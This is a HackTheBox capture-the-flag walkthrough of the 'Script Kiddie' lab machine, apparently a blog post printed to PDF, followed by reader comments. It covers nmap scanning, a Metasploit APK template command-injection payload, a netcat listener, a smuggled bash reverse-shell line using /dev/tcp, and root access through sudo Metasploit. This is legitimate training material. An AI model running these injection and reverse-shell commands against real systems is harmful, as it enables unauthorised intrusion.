4/24/2021 Script Kiddie : HackTheBox Walk Through – IT SECURITY DZ

IT SECURITY DZ

CYBERSECURITY

Script Kiddie : HackTheBox Walk Through

Recently HTB has released a machine named as Script Kiddie. Yess!! Script Kiddie which
definitely gives hint about the machine. Like we can assume that we wont be doing much rather
than relying on the tools for the same. Guess that’s what Script Kiddie means!!

So lets see how easy this machine could be ??

Concept Learnt:

1. Enumeration
2. Malicious payload (template bin)
3. Reverse Shell
4. Privilege escalation

https://itsecuritydz.wordpress.com/2021/03/09/script-kiddie-hackthebox-walk-through/ 1/9
4/24/2021 Script Kiddie : HackTheBox Walk Through – IT SECURITY DZ

Port Scanning

First thing first, scanning the machine to find the open ports!

Command : nmap -A -T4 10.10.10.226

\ \ / /__ _ __ ___ _ __ ___

\ \ / / _ \ '_ \ / _ \| '_ ` _ \
\ V / __/ | | | (_) | | | | | |
\_/ \___|_| |_|\___/|_| |_| |_|

┌─[venom@venom]─[~]
└──╼ $sudo nmap -sC -sV 10.10.10.226
[sudo] password for venom:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-09 12:43 EST
Nmap scan report for 10.10.10.226
Host is up (0.088s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux;
protocol 2.0)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at

https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.33 seconds

Concluding that we have port 5000 and 22 open. Port 22 is for SSH and Port 5000 for HTTP!

Enumeration

Lets see what we have got on port 5000 of h p. Thus visiting IP address with port number.

Visit: 10.10.10.226:5000/ (in any browser)

https://itsecuritydz.wordpress.com/2021/03/09/script-kiddie-hackthebox-walk-through/ 2/9
4/24/2021 Script Kiddie : HackTheBox Walk Through – IT SECURITY DZ

By observing the web page , guess we have lot to try for exploits like Command Injection, RFI,
LFI, File Upload Vulnerability etc…
After trying all the options, we could get a reverse shell using File Upload Vulnerability leading
to command injection . Lets see how it is done..
Malicious Payload Creation:
So we have option of uploading template file for creating payload.
Searching on search engine (Google) about the template unix file exploit , we got the Rapid 7
APK Template Command Injection.
Guess we are lucky here, we have APK template command injection and option of upload APK
on the website. So we would creating payload and upload the malicious file to get the reverse
shell!
Using Metasploit (msfconsole)we would be using this steps:

https://itsecuritydz.wordpress.com/2021/03/09/script-kiddie-hackthebox-walk-through/ 3/9
4/24/2021 Script Kiddie : HackTheBox Walk Through – IT SECURITY DZ

FYI: This includes assigning LHOST, LPORT , RHOST, RPORT as shown below:

Once we have set up , the only thing left is to press Fire bu on!! I mean exploit…

Note : you may not find your exploit so update your exploitDB or download the exploit then enter
reload_all command

Now we would be uploading file to get the reverse shell. But but we need a listener , guess net
cat would work listening on port assigned on lport

\ \ / /__ _ __ ___ _ __ ___

\ \ / / _ \ '_ \ / _ \| '_ ` _ \
\ V / __/ | | | (_) | | | | | |
\_/ \___|_| |_|\___/|_| |_| |_|

┌─[venom@venom]─[~]
└──╼ $nc -lvp 5555
listening on [any] 5555 ...

All set !! Lets upload the file and see what happens!!

https://itsecuritydz.wordpress.com/2021/03/09/script-kiddie-hackthebox-walk-through/ 4/9
4/24/2021 Script Kiddie : HackTheBox Walk Through – IT SECURITY DZ

Change the options accordingly i mean lhost.

Boom Boom !! We got a reverse shell…

Changing it into interactive shell using python module

Command used: python3 -c “import pty;pty.spawn(‘/bin/bash’)

Exploring the system we would be completing our first checkpoint i.e user flag

One more thing which caught my a ention was we dont have enough permission and we do
have other account named pwn in the machine.
We do have scripts and file in machine but cannot access due to lack of privileges.
Privilege Escalation
Escalating to user with having higher privileges i.e pwn
While exploring the system, happen to encounter with file named as hackers. What caught my
a ention about the file was the group owner assigned to file i.e pwn
So we could be get reverse shell by executing command in the file.
Here is the link which we could :
h ps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20R
esources/Reverse%20Shell%20Cheatsheet.md
Now just we have manipulate the reverse shell code so as to store in the file.
Thus command used:

https://itsecuritydz.wordpress.com/2021/03/09/script-kiddie-hackthebox-walk-through/ 5/9
4/24/2021 Script Kiddie : HackTheBox Walk Through – IT SECURITY DZ

echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.30/1234 0>&1’ #” >> hackers

Here 10.10.14.30 is the host ip and 1234 is the port where we the listener would be listening.
Before this lets start the listener again on port 1234.

─[venom@venom]─[~]
└──╼ $nc -lvp 1234
listening on [any] 1234 ...

Now executing the command.

Since we have got the higher privileged users. Lets run the script which we aren’t able to i.e
scanlosers.sh

Huh!! We got nothing!

Lets check for the sudo (binary) vulnerabilities

Command used : sudo -l

Ohh nice!! We can run metasploit as sudo with no password!!

Running Metasploit with sudo privileges:

https://itsecuritydz.wordpress.com/2021/03/09/script-kiddie-hackthebox-walk-through/ 6/9
4/24/2021 Script Kiddie : HackTheBox Walk Through – IT SECURITY DZ

FYI: Metasploit console i.e msfconsole could run the bash shell in the terminal

Lets check does it work here:

Yeah!! Moving forward to check whether metasploit has started with root privileges

Ohh!! This was expected. Since we have got everything. Lets move to root directory in
metasploit shell and complete our second checkpoint i.e root hash

Finally pwned the user and root of Script Kiddie. It was kinda easy though !

For more blogs and updates stay tuned!

https://itsecuritydz.wordpress.com/2021/03/09/script-kiddie-hackthebox-walk-through/ 7/9
4/24/2021 Script Kiddie : HackTheBox Walk Through – IT SECURITY DZ

Published by zakou chender

nothing much , someone , somewhere , love cybersecurity stuff my name is Chender Zakaria i
am network engineer also pentester i love cybersecurity stuff , i love helping people so i made

this website for sharing my experience , helping you is my pleasure  View all posts by
zakou chender

March 9, 2021
Hackthebox

APK template command injection, hackthebox walkthrough, hackthebox writeups, Script

Kiddie : HackTheBox Walk Through, Script Kiddie writeup, ScriptKiddie hack the box
writeup

5 thoughts on “Script Kiddie : HackTheBox

Walk Through”

1. shahid
says:
April 15, 2021 at 08:58
hi, I’m unable to upload msg.apk file. its in root and I can’t upload by selecting browse
option. even when i searched for .msf4 in terminal can you please help me out?

[+] msf.apk stored at /root/.msf4/local/msf.apk

this is file location and how to upload ??

2. shahid
says:
April 15, 2021 at 09:33
issues solved .. I uploaded the file and cracked the user hash…

1. zakou chender
says:
April 15, 2021 at 21:21
congrat , just have patience

3. shahid1112

https://itsecuritydz.wordpress.com/2021/03/09/script-kiddie-hackthebox-walk-through/ 8/9
4/24/2021 Script Kiddie : HackTheBox Walk Through – IT SECURITY DZ

says:
April 16, 2021 at 23:19
hello, after cracking user hash, next is root hash. I followed the same as you did. but I’m
unable to enter into pwn@scriptkiddie. I had tried everything I know. I even tied to generate
SSH keys by using
ssh-keygen..even that is unsuccessful.
could you please help me out..?

4. shahid1112
says:
April 17, 2021 at 09:04
should I upload any file during listening to port 1234?

WEBSITE POWERED BY WORDPRESS.COM.

UP ↑

https://itsecuritydz.wordpress.com/2021/03/09/script-kiddie-hackthebox-walk-through/ 9/9